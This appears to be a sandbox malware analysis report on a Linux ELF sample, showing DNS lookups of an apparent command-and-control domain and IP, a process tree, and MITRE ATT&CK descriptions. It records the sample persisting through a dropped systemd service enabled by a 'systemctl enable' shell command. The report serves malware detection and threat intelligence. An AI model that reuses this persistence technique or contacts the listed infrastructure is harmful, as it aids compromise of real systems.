Oct 7, 2024 16:26:48.942029953 CEST	53	48980	8.8.8.8	192.168.2.13

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 7, 2024 16:23:18.959438086 CEST	192.168.2.13	8.8.8.8	0xdc8c	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:23.664307117 CEST	192.168.2.13	8.8.8.8	0xf693	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:28.337416887 CEST	192.168.2.13	8.8.8.8	0x6cf5	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:35.976670980 CEST	192.168.2.13	8.8.8.8	0xa516	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:47.655847073 CEST	192.168.2.13	8.8.8.8	0x98f9	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:56.432877064 CEST	192.168.2.13	8.8.8.8	0x14b9	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:08.099666119 CEST	192.168.2.13	8.8.8.8	0x6d7a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:10.710761070 CEST	192.168.2.13	8.8.8.8	0xab4a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:15.429326057 CEST	192.168.2.13	8.8.8.8	0xd3d	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:18.143685102 CEST	192.168.2.13	8.8.8.8	0x27ed	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:21.766969919 CEST	192.168.2.13	8.8.8.8	0xa25	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:32.404035091 CEST	192.168.2.13	8.8.8.8	0x412b	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:43.397604942 CEST	192.168.2.13	8.8.8.8	0xf12b	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:49.046722889 CEST	192.168.2.13	8.8.8.8	0xf3bd	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:52.771466970 CEST	192.168.2.13	8.8.8.8	0x4bef	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:59.404542923 CEST	192.168.2.13	8.8.8.8	0xc559	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:08.060456038 CEST	192.168.2.13	8.8.8.8	0x5539	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:12.755280018 CEST	192.168.2.13	8.8.8.8	0x8a9a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:22.388566017 CEST	192.168.2.13	8.8.8.8	0x7e13	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:25.045933008 CEST	192.168.2.13	8.8.8.8	0xda65	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:33.699354887 CEST	192.168.2.13	8.8.8.8	0xd2c1	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:43.354857922 CEST	192.168.2.13	8.8.8.8	0xff4b	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:50.998317957 CEST	192.168.2.13	8.8.8.8	0x6d4a	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:02.640887976 CEST	192.168.2.13	8.8.8.8	0x81d	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:04.193520069 CEST	192.168.2.13	1.1.1.1	0x787a	Standard query (0)	daisy.ubuntu.com	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:04.193579912 CEST	192.168.2.13	1.1.1.1	0xeddb	Standard query (0)	daisy.ubuntu.com	28	IN (0x0001)	false
Oct 7, 2024 16:26:12.337531090 CEST	192.168.2.13	8.8.8.8	0x5f02	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:18.981430054 CEST	192.168.2.13	8.8.8.8	0x7925	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:29.059652090 CEST	192.168.2.13	8.8.8.8	0xcd0d	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:39.691375971 CEST	192.168.2.13	8.8.8.8	0xb1dc	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:45.374300957 CEST	192.168.2.13	8.8.8.8	0x6625	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:48.934211969 CEST	192.168.2.13	8.8.8.8	0x3c47	Standard query (0)	yi0key.heleh.com.vn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Oct 7, 2024 16:23:18.970434904 CEST	8.8.8.8	192.168.2.13	0xdc8c	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:23.685204983 CEST	8.8.8.8	192.168.2.13	0xf693	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:28.344995022 CEST	8.8.8.8	192.168.2.13	0x6cf5	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:35.983900070 CEST	8.8.8.8	192.168.2.13	0xa516	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:47.813662052 CEST	8.8.8.8	192.168.2.13	0x98f9	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:23:56.440123081 CEST	8.8.8.8	192.168.2.13	0x14b9	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:08.107064962 CEST	8.8.8.8	192.168.2.13	0x6d7a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:10.721393108 CEST	8.8.8.8	192.168.2.13	0xab4a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:15.436945915 CEST	8.8.8.8	192.168.2.13	0xd3d	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:18.150753021 CEST	8.8.8.8	192.168.2.13	0x27ed	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:21.773927927 CEST	8.8.8.8	192.168.2.13	0xa25	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:32.788969040 CEST	8.8.8.8	192.168.2.13	0x412b	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:43.407041073 CEST	8.8.8.8	192.168.2.13	0xf12b	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:49.054338932 CEST	8.8.8.8	192.168.2.13	0xf3bd	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:52.781723022 CEST	8.8.8.8	192.168.2.13	0x4bef	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:24:59.411583900 CEST	8.8.8.8	192.168.2.13	0xc559	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:08.080157995 CEST	8.8.8.8	192.168.2.13	0x5539	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:12.762293100 CEST	8.8.8.8	192.168.2.13	0x8a9a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:22.395881891 CEST	8.8.8.8	192.168.2.13	0x7e13	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:25.052839041 CEST	8.8.8.8	192.168.2.13	0xda65	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:33.706976891 CEST	8.8.8.8	192.168.2.13	0xd2c1	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:43.362080097 CEST	8.8.8.8	192.168.2.13	0xff4b	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:25:51.006279945 CEST	8.8.8.8	192.168.2.13	0x6d4a	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:02.648025036 CEST	8.8.8.8	192.168.2.13	0x81d	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:04.201644897 CEST	1.1.1.1	192.168.2.13	0x787a	No error (0)	daisy.ubuntu.com	162.213.35.25	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:04.201644897 CEST	1.1.1.1	192.168.2.13	0x787a	No error (0)	daisy.ubuntu.com	162.213.35.24	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:12.345773935 CEST	8.8.8.8	192.168.2.13	0x5f02	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:19.438148975 CEST	8.8.8.8	192.168.2.13	0x7925	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:29.067174911 CEST	8.8.8.8	192.168.2.13	0xcd0d	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:39.698496103 CEST	8.8.8.8	192.168.2.13	0xb1dc	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:46.285931110 CEST	8.8.8.8	192.168.2.13	0x6625	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false
Oct 7, 2024 16:26:48.942029953 CEST	8.8.8.8	192.168.2.13	0x3c47	No error (0)	yi0key.heleh.com.vn	91.200.103.117	A (IP address)	IN (0x0001)	false

System Behavior

Analysis Process: na.elf PID: 5452, Parent PID: 5376

General

Start time (UTC):	14:23:17
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	/tmp/na.elf
File size:	149016 bytes
MD5 hash:	535cff3a16d579f89346b0916110d25e

Start time (UTC):	14:23:17
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	149016 bytes
MD5 hash:	535cff3a16d579f89346b0916110d25e

Start time (UTC):	14:23:17
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	149016 bytes
MD5 hash:	535cff3a16d579f89346b0916110d25e

Start time (UTC):	14:23:17
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:23:17
Start date (UTC):	07/10/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time (UTC):	14:23:17
Start date (UTC):	07/10/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable sbolo.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Start time (UTC):	14:23:18
Start date (UTC):	07/10/2024
Path:	/tmp/na.elf
Arguments:	-
File size:	149016 bytes
MD5 hash:	535cff3a16d579f89346b0916110d25e

Start time (UTC):	14:23:18
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Start time (UTC):	14:23:18
Start date (UTC):	07/10/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report na.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Warnings

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/etc/systemd/system/sbolo.service

/memfd:snapd-env-generator (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

System Behavior

Analysis Process: na.elf PID: 5452, Parent PID: 5376

General

Chronological Activities

Analysis Process: na.elf PID: 5453, Parent PID: 5452

General

Chronological Activities

Analysis Process: na.elf PID: 5454, Parent PID: 5452

General

Chronological Activities

Analysis Process: sh PID: 5454, Parent PID: 5452

General

Chronological Activities

Analysis Process: sh PID: 5455, Parent PID: 5454

General

Linux Analysis Report
na.elf